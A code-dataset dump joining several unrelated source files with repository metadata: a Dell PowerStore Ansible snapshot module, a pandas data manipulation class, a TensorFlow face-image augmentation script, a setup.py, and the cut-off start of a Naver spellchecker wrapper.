['volume', 'volume_group'], ['snapshot_name', 'snapshot_id'],
['desired_retention', 'expiration_timestamp']
]
required_one_of = [
['snapshot_name', 'snapshot_id'], ['volume', 'volume_group']
]
# Initialize the Ansible module
self.module = AnsibleModule(
argument_spec=self.module_params,
supports_check_mode=True,
mutually_exclusive=mutually_exclusive,
required_one_of=required_one_of
)
LOG.info(
'HAS_PY4PS = {0} , IMPORT_ERROR = {1}'.format(
HAS_PY4PS, IMPORT_ERROR))
if HAS_PY4PS is False:
self.module.fail_json(msg=IMPORT_ERROR)
LOG.info(
'IS_SUPPORTED_PY4PS_VERSION = {0} , VERSION_ERROR = {1}'.format(
IS_SUPPORTED_PY4PS_VERSION,
VERSION_ERROR))
if IS_SUPPORTED_PY4PS_VERSION is False:
self.module.fail_json(msg=VERSION_ERROR)
self.py4ps_conn = utils.get_powerstore_connection(self.module.params,
application_type=APPLICATION_TYPE)
self.protection = self.py4ps_conn.protection
self.provisioning = self.py4ps_conn.provisioning
LOG.info('Got Py4ps instance for PowerStore')
def get_vol_snap_details(self, snapshot):
"""Returns details of a Volume Snapshot"""
if snapshot is None:
self.module.fail_json(msg="Snapshot not found")
try:
return self.protection.get_volume_snapshot_details(snapshot['id'])
except Exception as e:
self.module.fail_json(msg="Failed to get details of "
"Volume snap: "
"{0} with error {1}".format(
snapshot['name'], str(e)))
def get_vol_group_snap_details(self, snapshot):
"""Returns details of a Volume Group Snapshot"""
if snapshot is None:
self.module.fail_json(msg="Snapshot not found")
try:
return self.protection.get_volume_group_snapshot_details(
snapshot['id'])
except Exception as e:
self.module.fail_json(msg="Failed to get details of "
"VG snap: "
"{0} with error {1}".format(
snapshot['name'], str(e)))
def get_vol_snapshot(self, volume_id, snapshot_name, snapshot_id):
"""Get the volume snapshot"""
try:
vol_snaps = self.protection.get_volume_snapshots(volume_id)
snapshot = None
for snap in vol_snaps:
if snapshot_name is not None:
if snap['name'] == snapshot_name:
LOG.info("Found snapshot by name: "
"{0}".format(snapshot_name))
snapshot = snap
break
elif snapshot_id is not None:
if snap['id'] == snapshot_id:
LOG.info("Found snapshot by ID: "
"{0}".format(snapshot_id))
snapshot = snap
break
return snapshot
except Exception as e:
LOG.info("Not able to get snapshot details for "
"volume: {0} with error {1}".format(volume_id,
str(e)))
def get_vol_group_snapshot(self, vg_id, snapshot_name, snapshot_id):
"""Get Volume Group Snapshot"""
try:
vg_snaps = self.protection.get_volume_group_snapshots(vg_id)
snapshot = None
for snap in vg_snaps:
if snapshot_name is not None:
if snap['name'] == snapshot_name:
LOG.info("Found snapshot by name: "
"{0}".format(snapshot_name))
snapshot = snap
break
elif snapshot_id is not None:
if snap['id'] == snapshot_id:
LOG.info("Found snapshot by ID: "
"{0}".format(snapshot_id))
snapshot = snap
break
return snapshot
except Exception as e:
LOG.info("Not able to get snapshot details for "
"volume group: {0} with error {1}".format(
vg_id, str(e)))
def get_vol_id_from_volume(self, volume):
"""Maps the volume to volume ID"""
is_valid_uuid = self.is_valid_uuid(volume)
if is_valid_uuid:
try:
vol = self.provisioning.get_volume_details(volume)
return vol['id']
except Exception as e:
LOG.info("No volume found by ID: {0}, "
"looking it up by name. Error: {1}".format(volume,
str(e)))
pass
try:
vol = \
self.provisioning.get_volume_by_name(volume)
if vol:
return vol[0]['id']
else:
self.module.fail_json(
msg="Volume {0} was not found on "
"the array.".format(volume))
except Exception as e:
self.module.fail_json(msg="Failed to get vol {0} by "
"name with error "
"{1}".format(volume, str(e)))
def get_vol_group_id_from_vg(self, volume_group):
"""Maps the volume group to Volume Group ID"""
is_valid_uuid = self.is_valid_uuid(volume_group)
if is_valid_uuid:
try:
vg = self.provisioning.get_volume_group_details(
volume_group_id=volume_group)
return vg['id']
except Exception as e:
LOG.info("No volume group found by ID: {0}, "
"looking it up by name. Error {1}".format(
volume_group, str(e)))
pass
try:
vg = \
self.provisioning.get_volume_group_by_name(volume_group)
if vg:
return vg[0]['id']
else:
self.module.fail_json(
msg="Volume Group {0} was not found on "
"the array.".format(volume_group))
except Exception as e:
self.module.fail_json(msg="Failed to get volume group: "
"{0} by name with error: "
"{1}".format(volume_group, str(e)))
def create_vol_snapshot(self, snapshot_name,
description,
volume_id,
desired_retention,
retention_unit,
expiration_timestamp,
new_name):
"""Create a snap for a volume on PowerStore"""
if snapshot_name is None:
self.module.fail_json(msg="Please provide a "
"valid snapshot name.")
if desired_retention is None and expiration_timestamp is None:
self.module.fail_json(msg="Please provide "
"desired_retention or expiration_"
"timestamp for creating a snapshot")
if new_name is not None:
self.module.fail_json(msg="Invalid param: new_name while "
"creating a new snapshot.")
snapshot = self.get_vol_snapshot(volume_id, snapshot_name, None)
if snapshot is not None:
LOG.error("Snapshot: {0} already exists".format(snapshot_name))
return False
if desired_retention is not None and desired_retention != 'None':
if retention_unit is None:
expiration_timestamp = (datetime.utcnow() +
timedelta(
hours=int(desired_retention))
).isoformat() \
+ 'Z'
elif retention_unit == 'days':
expiration_timestamp = (datetime.utcnow() + timedelta(
days=int(desired_retention))).isoformat() + 'Z'
elif retention_unit == 'hours':
expiration_timestamp = (datetime.utcnow() + timedelta(
hours=int(desired_retention))).isoformat() + 'Z'
elif desired_retention == 'None':
expiration_timestamp = None
try:
resp = \
self.protection.create_volume_snapshot(
name=snapshot_name,
description=description,
volume_id=volume_id,
expiration_timestamp=expiration_timestamp)
return True, resp
except Exception as e:
error_message = 'Failed to create snapshot: {0} for ' \
'volume {1} with error: {2}'
LOG.error(error_message.format(snapshot_name,
self.module.params['volume'],
str(e)))
self.module.fail_json(msg=error_message.format(snapshot_name,
self.module.params[
'volume'],
str(e)))
def create_vg_snapshot(self, snapshot_name,
description,
vg_id,
desired_retention,
retention_unit,
expiration_timestamp,
new_name):
"""Create a snap for a VG on PowerStore"""
if snapshot_name is None:
self.module.fail_json(msg="Please provide a "
"valid snapshot name.")
if desired_retention is None and expiration_timestamp is None:
self.module.fail_json(msg="Please provide "
"desired_retention or expiration_"
"timestamp for creating a snapshot")
if new_name is not None:
self.module.fail_json(msg="Invalid param: new_name while "
"creating a new snapshot.")
if desired_retention is not None and desired_retention != 'None':
if retention_unit is None:
expiration_timestamp = (datetime.utcnow() +
timedelta(
hours=int(
desired_retention))).isoformat() \
+ 'Z'
elif retention_unit == 'days':
expiration_timestamp = (datetime.utcnow() + timedelta(
days=int(desired_retention))).isoformat() + 'Z'
elif retention_unit == 'hours':
expiration_timestamp = (datetime.utcnow() + timedelta(
hours=int(desired_retention))).isoformat() + 'Z'
elif desired_retention == 'None':
expiration_timestamp = None
try:
resp = \
self.protection.create_volume_group_snapshot(
name=snapshot_name,
description=description,
volume_group_id=vg_id,
expiration_timestamp=expiration_timestamp)
return True, resp
except Exception as e:
error_message = 'Failed to create snapshot: {0} for ' \
'VG {1} with error: {2}'
LOG.error(error_message.format(snapshot_name,
self.module.params['volume_group'],
str(e)))
self.module.fail_json(msg=error_message.format(
snapshot_name,
self.module.params['volume_group'],
str(e)))
def delete_vol_snapshot(self, snapshot):
"""Deletes a Vol snapshot on PowerStore"""
try:
self.protection.delete_volume_snapshot(snapshot['id'])
return True
except Exception as e:
error_message = 'Failed to delete snapshot: {0} with error: {1}'
LOG.error(error_message.format(snapshot['name'], str(e)))
self.module.fail_json(msg=error_message.format(snapshot['name'],
str(e)))
def delete_vol_group_snapshot(self, snapshot):
"""Deletes a Vol group snapshot on PowerStore"""
try:
self.protection.delete_volume_group_snapshot(snapshot['id'])
return True
except Exception as e:
error_message = 'Failed to delete snapshot: {0} with error: {1}'
LOG.error(error_message.format(snapshot['name'], str(e)))
self.module.fail_json(msg=error_message.format(snapshot['name'],
str(e)))
def rename_vol_snapshot(self, snapshot, new_name):
"""Renames a vol snapshot"""
# Check if new name is same is present name
if snapshot is None:
self.module.fail_json(msg="Snapshot not found.")
if snapshot['name'] == new_name:
return False
try:
self.protection.modify_volume_snapshot(
snapshot_id=snapshot['id'],
name=new_name)
return True
except Exception as e:
error_message = 'Failed to rename snapshot: {0} with error: {1}'
LOG.error(error_message.format(snapshot['name'], str(e)))
self.module.fail_json(msg=error_message.format(snapshot['name'],
str(e)))
def rename_vol_group_snapshot(self, snapshot, new_name):
"""Renames a vol group snapshot"""
if snapshot is None:
self.module.fail_json(msg="Snapshot not found.")
if snapshot['name'] == new_name:
return False
try:
self.protection.modify_volume_group_snapshot(
snapshot_id=snapshot['id'],
name=new_name)
return True
except Exception as e:
error_message = 'Failed to delete snapshot: {0} with error: {1}'
LOG.error(error_message.format(snapshot['name'], str(e)))
self.module.fail_json(msg=error_message.format(snapshot['name'],
str(e)))
def check_snapshot_modified(self, snapshot, volume, volume_group,
description, desired_retention,
retention_unit, expiration_timestamp):
"""Determines whether the snapshot has been modified"""
LOG.info("Determining if the snap has been modified...")
snapshot_modification_details = dict()
snapshot_modification_details['is_description_modified'] = False
snapshot_modification_details['new_description_value'] = None
snapshot_modification_details['is_timestamp_modified'] = False
snapshot_modification_details['new_expiration_timestamp_value'] = None
if desired_retention is None and expiration_timestamp is None:
LOG.info("desired_retention and expiration_time are both "
"not provided, we don't check for snapshot modification "
"in this case. The snapshot details would be returned, "
"if available.")
return False, snapshot_modification_details
snap_details = None
if volume is not None:
snap_details = self.get_vol_snap_details(snapshot)
elif volume_group is not None:
snap_details = self.get_vol_group_snap_details(snapshot)
LOG.debug("The snap details are: {0}".format(snap_details))
snap_creation_timestamp = None
if 'creation_timestamp' in snap_details:
# Only taking into account YYYY-MM-DDTHH-MM, ignoring
# seconds component.
snap_creation_timestamp = \
snap_details['creation_timestamp'][0:16] + 'Z'
if desired_retention is not None and desired_retention != 'None':
if retention_unit is None:
expiration_timestamp = (datetime.strptime(
snap_creation_timestamp, '%Y-%m-%dT%H:%MZ') +
timedelta(
hours=int(desired_retention))
).isoformat() \
+ 'Z'
elif retention_unit == 'days':
expiration_timestamp = (datetime.strptime(
snap_creation_timestamp, '%Y-%m-%dT%H:%MZ') + timedelta(
days=int(desired_retention))).isoformat() + 'Z'
elif retention_unit == 'hours':
expiration_timestamp = (datetime.strptime(
snap_creation_timestamp, '%Y-%m-%dT%H:%MZ') + timedelta(
hours=int(desired_retention))).isoformat() + 'Z'
elif desired_retention == 'None':
expiration_timestamp = None
LOG.info("The new expiration timestamp is {0}".format(
expiration_timestamp))
modified = False
if 'expiration_timestamp' in snap_details['protection_data'] \
and snap_details['protection_data']['expiration_timestamp'] \
is not None and expiration_timestamp is not None:
# Only taking into account YYYY-MM-DDTHH-MM, ignoring
# seconds component.
if snap_details['protection_data']['expiration_timestamp'][0:16] \
!= expiration_timestamp[0:16]:
# We can tolerate a delta of two minutes.
existing_timestamp = \
snap_details['protection_data']['expiration_timestamp'][
0:16] + 'Z'
new_timestamp = expiration_timestamp[0:16] + 'Z'
existing_time_obj = datetime.strptime(existing_timestamp,
'%Y-%m-%dT%H:%MZ')
new_time_obj = datetime.strptime(new_timestamp,
'%Y-%m-%dT%H:%MZ')
if existing_time_obj > new_time_obj:
td = existing_time_obj - new_time_obj
else:
td = new_time_obj - existing_time_obj
td_mins = int(round(td.total_seconds() / 60))
if td_mins > 2:
snapshot_modification_details[
'is_timestamp_modified'] = True
snapshot_modification_details[
'new_expiration_timestamp_value'] = \
expiration_timestamp
modified = True
elif 'expiration_timestamp' not in snap_details['protection_data'] \
and expiration_timestamp is not None:
snapshot_modification_details['is_timestamp_modified'] = True
snapshot_modification_details[
'new_expiration_timestamp_value'] = expiration_timestamp
modified = True
elif 'expiration_timestamp' in snap_details['protection_data'] \
and expiration_timestamp is None:
if snap_details['protection_data'][
'expiration_timestamp'] is not None:
snapshot_modification_details['is_timestamp_modified'] = True
snapshot_modification_details[
'new_expiration_timestamp_value'] = expiration_timestamp
modified = True
elif 'expiration_timestamp' in snap_details['protection_data'] and \
snap_details['protection_data']['expiration_timestamp'] is \
None and expiration_timestamp is not None:
snapshot_modification_details['is_timestamp_modified'] = True
snapshot_modification_details[
'new_expiration_timestamp_value'] = expiration_timestamp
modified = True
if 'description' in snap_details and description is not None:
if snap_details['description'] != description:
snapshot_modification_details['is_description_modified'] = \
True
snapshot_modification_details['new_description_value'] \
= description
modified = True
LOG.info("Snapshot modified {0}, modification details: {1}"
.format(modified, snapshot_modification_details))
return modified, snapshot_modification_details
def modify_vol_snapshot(self, snapshot,
snapshot_modification_details):
"""Modify a volume snapshot"""
try:
changed = False
if snapshot_modification_details['is_description_modified']:
new_description = \
snapshot_modification_details['new_description_value']
self.protection.modify_volume_snapshot(
snapshot_id=snapshot['id'],
description=new_description)
changed = True
if snapshot_modification_details['is_timestamp_modified']:
new_timestamp = \
snapshot_modification_details[
'new_expiration_timestamp_value']
self.protection.modify_volume_snapshot(
snapshot_id=snapshot['id'],
expiration_timestamp=new_timestamp)
changed = True
if changed:
resp = self.get_vol_snap_details(
snapshot)
return changed, resp
else:
return changed, None
except Exception as e:
error_message = 'Failed to modify snapshot {0} with error {1}'
LOG.info(error_message.format(snapshot['name'], str(e)))
self.module.fail_json(
msg=error_message.format(snapshot['name'], str(e)))
def modify_vol_group_snapshot(self, snapshot,
snapshot_modification_details):
"""Modify a volume group snapshot"""
try:
changed = False
if snapshot_modification_details['is_description_modified']:
new_description = \
snapshot_modification_details['new_description_value']
self.protection.modify_volume_group_snapshot(
snapshot_id=snapshot['id'],
description=new_description)
changed = True
if snapshot_modification_details['is_timestamp_modified']:
new_timestamp = \
snapshot_modification_details[
'new_expiration_timestamp_value']
self.protection.modify_volume_group_snapshot(
snapshot_id=snapshot['id'],
expiration_timestamp=new_timestamp)
changed = True
if changed:
resp = self.get_vol_group_snap_details(
snapshot)
return changed, resp
else:
return changed, None
except Exception as e:
error_message = 'Failed to modify snapshot {0} with error {1}'
LOG.info(error_message.format(snapshot['name'], str(e)))
self.module.fail_json(msg=error_message.format(snapshot['name'],
str(e)))
def is_valid_uuid(self, val):
"""Determines if the string is a valid UUID"""
try:
UUID(str(val))
return True
except ValueError:
return False
def validate_expiration_timestamp(self, expiration_timestamp):
"""Validates whether the expiration timestamp is valid"""
try:
datetime.strptime(expiration_timestamp,
'%Y-%m-%dT%H:%M:%SZ')
except ValueError:
self.module.fail_json(msg='Incorrect date format, '
'should be YYYY-MM-DDTHH:MM:SSZ')
def validate_desired_retention(self, desired_retention):
"""Validates the specified desired retention"""
try:
int(desired_retention)
except ValueError:
if desired_retention == 'None':
LOG.info("Desired retention is set to 'None'")
else:
self.module.fail_json(msg="Please provide a valid integer"
" as the desired retention.")
def perform_module_operation(self):
"""
Perform different actions on VG or volume Snapshot based on user
parameter chosen in playbook
"""
volume = self.module.params['volume']
volume_group = self.module.params['volume_group']
snapshot_name = self.module.params['snapshot_name']
snapshot_id = self.module.params['snapshot_id']
new_snapshot_name = self.module.params['new_snapshot_name']
desired_retention = self.module.params['desired_retention']
retention_unit = self.module.params['retention_unit']
expiration_timestamp = self.module.params['expiration_timestamp']
description = self.module.params['description']
state = self.module.params['state']
result = dict(
changed=False,
create_vg_snap='',
delete_vg_snap='',
modify_vg_snap='',
create_vol_snap='',
delete_vol_snap='',
modify_vol_snap='',
snap_details='',
)
snapshot = None
volume_id = None
volume_group_id = None
if expiration_timestamp is not None:
self.validate_expiration_timestamp(expiration_timestamp)
if desired_retention is not None:
self.validate_desired_retention(desired_retention)
if volume is not None:
volume_id = self.get_vol_id_from_volume(volume)
elif volume_group is not None:
volume_group_id = self.get_vol_group_id_from_vg(volume_group)
if volume is not None:
snapshot = self.get_vol_snapshot(volume_id, snapshot_name,
snapshot_id)
elif volume_group is not None:
snapshot = self.get_vol_group_snapshot(volume_group_id,
snapshot_name,
snapshot_id)
is_snap_modified = False
snapshot_modification_details = dict()
if snapshot is not None:
is_snap_modified, snapshot_modification_details = \
self.check_snapshot_modified(snapshot,
volume,
volume_group,
description,
desired_retention,
retention_unit,
expiration_timestamp)
if state == 'present' and volume and not snapshot:
LOG.info("Creating new snapshot: {0} for volume: {1}".format(
snapshot_name, volume))
result['create_vol_snap'], result['snap_details'] = \
self.create_vol_snapshot(snapshot_name,
description,
volume_id,
desired_retention,
retention_unit,
expiration_timestamp,
new_snapshot_name)
elif state == 'absent' and (snapshot_name or snapshot_id) and \
volume and snapshot:
LOG.info("Deleting snapshot {0} for Volume {1}".format(
snapshot['name'], volume))
result['delete_vol_snap'] = \
self.delete_vol_snapshot(snapshot)
if state == 'present' and volume_group and not snapshot:
LOG.info("Creating new snapshot: {0} for VG: {1}".format(
snapshot_name, volume_group))
result['create_vg_snap'], result['snap_details'] = \
self.create_vg_snapshot(snapshot_name,
description,
volume_group_id,
desired_retention,
retention_unit,
expiration_timestamp,
new_snapshot_name)
elif state == 'absent' and (
snapshot_name or snapshot_id) and volume_group \
and snapshot:
LOG.info("Deleting snapshot {0} for VG {1}".format(
snapshot['name'], volume_group))
result['delete_vg_snap'] = \
self.delete_vol_group_snapshot(snapshot)
if state == 'present' and volume and new_snapshot_name:
LOG.info("Renaming snapshot {0} to new name {1}".format(
snapshot['name'], new_snapshot_name))
result['modify_vol_snap'] = self.rename_vol_snapshot(
snapshot, new_snapshot_name)
elif state == 'present' and volume_group \
and new_snapshot_name:
LOG.info("Renaming snapshot {0} to new name {1}".format(
snapshot['name'], new_snapshot_name))
result['modify_vg_snap'] = self.rename_vol_group_snapshot(
snapshot, new_snapshot_name)
if state == 'present' and snapshot and volume and is_snap_modified:
LOG.info("Modifying snapshot {0}".format(snapshot['name']))
result['modify_vol_snap'], result['snap_details'] = \
self.modify_vol_snapshot(snapshot,
snapshot_modification_details) or \
result['modify_vol_snap']
elif state == 'present' and snapshot and volume_group \
and is_snap_modified:
LOG.info("Modifying snapshot {0}".format(snapshot['name']))
result['modify_vg_snap'], result['snap_details'] = \
self.modify_vol_group_snapshot(
snapshot,
snapshot_modification_details) or \
result['modify_vg_snap']
if state == 'present' and (snapshot_name or snapshot_id) and volume \
and not desired_retention \
and not expiration_timestamp:
result['snap_details'] = self.get_vol_snap_details(snapshot)
elif state == 'present' and (snapshot_name or snapshot_id) \
and volume_group and not desired_retention \
and not expiration_timestamp:
result['snap_details'] = self.get_vol_group_snap_details(
snapshot)
if result['create_vol_snap'] or result['delete_vol_snap'] or result[
'modify_vol_snap'] or result['create_vg_snap'] \
or result['delete_vg_snap'] or result['modify_vg_snap']:
result['changed'] = True
# Finally update the module result!
self.module.exit_json(**result)
def get_powerstore_snapshot_parameters():
return dict(
volume_group=dict(required=False, type='str'),
volume=dict(required=False, type='str'),
snapshot_name=dict(required=False, type='str'),
snapshot_id=dict(required=False, type='str'),
new_snapshot_name=dict(required=False, type='str'),
desired_retention=dict(required=False, type='str'),
retention_unit=dict(required=False, choices=['hours', 'days'],
type='str'),
expiration_timestamp=dict(required=False, type='str'),
description=dict(required=False, type='str'),
state=dict(required=True, choices=['present', 'absent'],
type='str')
)
def main():
"""Create PowerStore Snapshot object and perform action on it
based on user input from playbook"""
obj = PowerStoreSnapshot()
obj.perform_module_operation()
if __name__ == '__main__':
main()
| avs6/ansible-powerstore | dellemc_ansible/powerstore/library/dellemc_powerstore_snapshot.py | dellemc_powerstore_snapshot.py | py | 39,907 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "ansible.module_utils.dellemc_ansible_utils.get_logger",
"line_number": 184,
"usage_type": "call"
},
{
"api_name": "ansible.module_utils.dellemc_ansible_utils",
"line_number": 184,
"usage_type": "name"
},
{
"api_name": "logging.INFO",
"line_number": 185,
"us... |
13918851672 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Wed Oct 3 13:07:13 2018
@author: marcos
"""
import pandas as pd
import csv
import pickle as pkl
import numpy as np
import scipy.stats as sts
from sklearn import preprocessing as prep
# =============================================================================
# Data Manipulation Tool
# =============================================================================
class DMT(object):
def __init__(self, database_file, file_format='csv', sep=',', decimal='.', orient='index'):
self.file = database_file
self.file_format = file_format
self.sep = sep
self.decimal = decimal
self.orient = orient
self.classes = None
self.minima = None
self.maxima = None
self.outliers_inf = None
self.outliers_sup = None
self.normalized = False
# _index is used for iterator
self._index = 0
if self.file_format == 'csv':
self.df = pd.read_csv(self.file, sep=self.sep)
elif self.file_format == 'json':
self.df = pd.read_json(self.file)
elif self.file_format == 'dict':
persisted_dict = pkl.load(open(database_file, 'rb'))
self.df = pd.DataFrame.from_dict(persisted_dict, orient=self.orient)
############ I/O and Import/Export Methods ####################
def print_summary(self):
print(' Summary of stored data:')
print('-------------------------------------')
print('%8s | %15s | %8s' % ('Id', 'Name', 'Type'))
print('-------------------------------------')
for i,col in enumerate(self.df.dtypes):
print('%8d | %15s | %8s' % (i, self.df.columns[i], col))
print('-------------------------------------')
print()
def save_csv(self, output_file, numeric_only=False):
if numeric_only:
data = self.get_numeric_data()
else:
data = self.df
data.to_csv(output_file, sep=self.sep, decimal=self.decimal, quoting=csv.QUOTE_NONNUMERIC, index=False)
def save_json(self, output_file, orient='index', numeric_only=False):
if numeric_only:
data = self.get_numeric_data()
else:
data = self.df
data.to_json(output_file, orient=self.orient)
def save_dict(self, output_file, numeric_only=False):
if numeric_only:
data = self.get_numeric_data()
else:
data = self.df
pkl.dump(data.to_dict(orient=self.orient), open(output_file, 'wb'))
def get_json(self, numeric_only=False):
if numeric_only:
data = self.get_numeric_data()
else:
data = self.df
return data.to_json(orient=self.orient)
def get_dict(self, numeric_only=False):
if numeric_only:
data = self.get_numeric_data()
else:
data = self.df
return data.to_dict(orient=self.orient)
############ Column or row manipulation Methods ####################
def drop_columns(self, col_list):
self.df = self.df.drop(columns=col_list)
def set_class(self, column, categorical=True):
if categorical:
self.set_categorical(column)
self.classes = self.df[column].copy()
self.df.drop(columns=[column], inplace=True)
def is_classes_set(self):
return self.classes is not None
def get_classes(self):
return self.classes
# Encode categorical data into integer ids
def encode_categorical(self):
le = prep.LabelEncoder()
for x in self.df.columns:
if self.df[x].dtypes == 'object':
self.df[x] = le.fit_transform(self.df[x])
# Set a column to categorical data
def set_categorical(self, column):
self.df[column] = self.df[column].astype(str)
########### Magical Methods #################################
def __len__(self):
return len(self.df)
def __str__(self):
return str(self.df)
def __getitem__(self, index):
return self.df[index]
def __iter__(self):
return self
def __next__(self):
try:
result = self.df.loc[self.df.index[self._index]]
except IndexError:
raise StopIteration
self._index += 1
return result
############ Data Transformation Methods ####################
def get_stats(self, output_format='df'):
le = prep.LabelEncoder()
stats = {}
for i,a in enumerate(self.df.columns):
stats[a] = {}
## Type
stats[a]['type'] = self.df.dtypes[i]
## Counting
stats[a]['count'] = self.df[a].count()
## Non-unique values
stats[a]['nunique'] = self.df[a].nunique()
## Mode
mode = self.df[a].mode()
if len(mode) == 1:
stats[a]['mode'] = mode[0]
else:
stats[a]['mode'] = None
if pd.api.types.is_numeric_dtype(self.df[a]):
## Entropy
hist = np.histogram(self.df[a])[0]
p = hist / np.sum(hist)
stats[a]['entropy'] = sts.entropy(p)
## Variance
stats[a]['variance'] = self.df[a].var()
## Average
stats[a]['average'] = self.df[a].mean()
## Dispersion
if stats[a]['average']:
stats[a]['dispersion'] = stats[a]['variance']/stats[a]['average']
else:
stats[a]['dispersion'] = 0.0
## Standard deviation
stats[a]['std_dev'] = self.df[a].std()
## Minimum and maximum
stats[a]['min'] = self.df[a].min()
stats[a]['max'] = self.df[a].max()
## Median
stats[a]['median'] = self.df[a].median()
## Skewness and Kurtosis
stats[a]['skewness'] = self.df[a].skew()
stats[a]['kurtosis'] = self.df[a].kurt()
## Quantiles
qts = self.df[a].quantile([0.25, 0.5, 0.75])
stats[a]['quantile1'] = qts[0.25]
stats[a]['quantile2'] = qts[0.5]
stats[a]['quantile3'] = qts[0.75]
else:
tmp = le.fit_transform(self.df[a])
hist = np.histogram(tmp)[0]
p = hist / np.sum(hist)
stats[a]['entropy'] = sts.entropy(p)
stats[a]['variance'] = None
stats[a]['average'] = None
stats[a]['dispersion'] = None
stats[a]['std_dev'] = None
stats[a]['min'] = None
stats[a]['max'] = None
stats[a]['median'] = None
stats[a]['skewness'] = None
stats[a]['kurtosis'] = None
stats[a]['quantile1'] = None
stats[a]['quantile2'] = None
stats[a]['quantile3'] = None
stats_df = pd.DataFrame.from_dict(stats, orient=self.orient)
if output_format == 'df':
return stats_df
elif output_format == 'html':
return '<h2 style="text-align:center">Stored Data Description</h2>' + stats_df.to_html()
else:
return 'Stored Data Description\n' + str(stats_df)
def normalize(self):
if not self.normalized:
numeric_data = self.get_numeric_data()
maxima = numeric_data.max()
minima = numeric_data.min()
data_range = maxima - minima
data_range[data_range == 0] = 1.0
numeric_data = (numeric_data - minima) / data_range
self.df[numeric_data.columns] = numeric_data
self.minima = minima
self.maxima = maxima
self.normalized = True
def denormalize(self):
if self.normalized:
if (self.minima is not None) and (self.maxima is not None):
numeric_data = self.get_numeric_data()
numeric_data = numeric_data * (self.maxima - self.minima) + self.minima
self.df[numeric_data.columns] = numeric_data
self.normalized = False
def split_outliers(self, limQ1=25, limQ3=75, c=1.5):
numeric_data = self.get_numeric_data()
q1 = np.percentile(numeric_data, limQ1, axis=0)
q3 = np.percentile(numeric_data, limQ3, axis=0)
iqr = sts.iqr(numeric_data, axis=0)
keep = []
sup = []
inf = []
for i in range(len(numeric_data)):
d = numeric_data.loc[numeric_data.index[i]]
test_inf = d < q1 - c * iqr
if test_inf.any():
inf.append(i)
else:
test_sup = d > q3 + c * iqr
if test_sup.any():
sup.append(i)
else:
keep.append(i)
drop = False
if len(inf):
self.outliers_inf = self.df.loc[self.df.index[inf]]
drop = True
if len(sup):
self.outliers_sup = self.df.loc[self.df.index[sup]]
drop = True
if drop:
self.df.drop(inf + sup, inplace=True)
def get_numeric_data(self):
return self.df._get_numeric_data()
| mhfribeiro/safra-meta | modules/preprocess/dmt.py | dmt.py | py | 10,322 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "pandas.read_csv",
"line_number": 37,
"usage_type": "call"
},
{
"api_name": "pandas.read_json",
"line_number": 39,
"usage_type": "call"
},
{
"api_name": "pickle.load",
"line_number": 41,
"usage_type": "call"
},
{
"api_name": "pandas.DataFrame.from_di... |
41329717796 |
import tensorflow as tf
import numpy as np
import cv2
import os
def save_image(path, image) :
extension = os.path.splitext(path)[1]
result, encoded_img = cv2.imencode(extension, image)
if result :
with open(path, "wb") as f :
encoded_img.tofile(f)
# 대상 입력
target = input("대상을 입력하세요 : ")
# 사진 폴더 경로 설정
image_path = "./image/" + target + "_face"
# 폴더 내의 사진들 탐색
for i, img in enumerate(os.listdir(image_path)) :
# 사진 읽기
image = cv2.imdecode(np.fromfile(os.path.join(image_path, img), dtype=np.uint8), cv2.IMREAD_COLOR)
gray = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
# 사진 좌우 뒤집기
flipped = tf.image.flip_left_right(gray)
path = "./image/" + target + "_face/flipped" + img
save_image(path, np.array(flipped))
# 사진 그레이스케일 만들기
grayscaled = tf.image.rgb_to_grayscale(gray)
path = "./image/" + target + "_face/grayscaled" + img
save_image(path, np.array(flipped))
# 사진 포화시키기
for sf in range(1, 6) :
saturated = tf.image.adjust_saturation(gray, sf)
path = "./image/" + target + "_face/saturated" + str(sf) + img
save_image(path, np.array(saturated))
# 시진 밝기 변경하기
for delta in range(1, 6) :
bright = tf.image.adjust_brightness(gray, delta * 0.1)
path = "./image/" + target + "_face/bright" + str(delta) + img
save_image(path, np.array(bright))
print(i)
| moonsung1234/SimilarityComparisonProject | increase.py | increase.py | py | 1,532 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "os.path.splitext",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 8,
"usage_type": "attribute"
},
{
"api_name": "cv2.imencode",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "os.listdir",
"line_number... |
75187049704 | import os
from setuptools import setup
def read(fname):
return open(os.path.join(os.path.dirname(__file__), fname)).read()
with open('requirements.txt') as fin:
lines = fin.readlines()
lines = [o.strip() for o in lines]
lines = [o for o in lines if len(o) > 0]
req = [o for o in lines if not o.startswith('#') and not o.startswith('git+')]
setup(
name = "resvit",
version = "0.1",
author = "Nghia Huynh",
author_email = "huynhnguyenhieunghia1999@gmail.com",
description = ("An package of Image Pretraining using U-Net architecture"),
packages=['resvit'],
long_description=read('README.md'),
) | nghiahuynh-ai/ResViT | setup.py | setup.py | py | 643 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "os.path.join",
"line_number": 5,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 5,
"usage_type": "attribute"
},
{
"api_name": "os.path.dirname",
"line_number": 5,
"usage_type": "call"
},
{
"api_name": "setuptools.setup",
"line_n... |
41924245365 | from .sentence_cutting import cutting_500_under
import requests, json
def cleaned_result(final_result):
result = []
tmp = final_result.split('<br>')
WRONG_SPELLING = "<span class='red_text'>"
WRONG_SPACING = "<span class='green_text'>"
AMBIGUOUS = "<span class='violet_text'>"
STATISTICAL_CORRECTION = "<span class='blue_text'>"
for idx in range(len(tmp)):
tmp[idx] = tmp[idx].replace(WRONG_SPELLING,'<span style="color:#CC0000">')
tmp[idx] = tmp[idx].replace(WRONG_SPACING,'<span style="color:#00CC00">')
tmp[idx] = tmp[idx].replace(AMBIGUOUS,'<span style="color:#CC00CC">')
tmp[idx] = tmp[idx].replace(STATISTICAL_CORRECTION,'<span style="color:#3B78FF">')
tmp[idx] = tmp[idx].replace('"','"').replace("'","'")
if "<span" not in tmp[idx]:
tmp[idx] = f"<span>{tmp[idx]}</span>"
result.append(tmp[idx])
return result
def check(text):
base_url = 'https://m.search.naver.com/p/csearch/ocontent/spellchecker.nhn'
_agent = requests.Session()
final_result = []
if len(text) > 500:
cutted_text = cutting_500_under(text)
for sentence in cutted_text:
tmp_result = []
payload = {
'_callback': 'window.__jindo2_callback._spellingCheck_0',
'q': sentence
}
headers = {
